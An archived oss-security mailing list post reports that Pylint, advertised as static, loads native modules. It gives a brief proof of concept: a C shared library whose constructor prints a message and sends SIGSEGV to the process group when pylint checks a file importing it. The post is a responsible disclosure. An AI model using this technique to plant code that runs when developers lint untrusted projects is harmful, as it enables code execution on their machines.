Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 29 Sep 2014 14:32:21 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Pylint checks not as static as one would think

Pylint[0] is advertised as "a static code checker, meaning it can 
analyse your code without actually running it"[1] and that it "does 
not import live modules"[1].

This is, unfortunately, far from reality. Here's a PoC:

$ cat moo.py
from _moo import *

$ cat moo.c
#include <stdio.h>
#include <signal.h>
void __attribute__((constructor)) moo() {
	printf("moo!\n");
	kill(0, SIGSEGV);
}

$ gcc -Wall -shared -fPIC moo.c -o _moo.so

$ pylint moo.py
No config file found, using default configuration
moo!
Segmentation fault


My understanding is that upstream Pylint maintainers consider this 
behavior intentional[2]. But even then, I think it's a serious 
documentation flaw.

Should a CVE ID be assigned to this bug? If yes, it should be a 
CVE-2010-XXXX.


[0] http://www.pylint.org/
[1] http://docs.pylint.org/faq.html#about-pylint
[2] https://bugs.debian.org/591676#28

-- 
Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ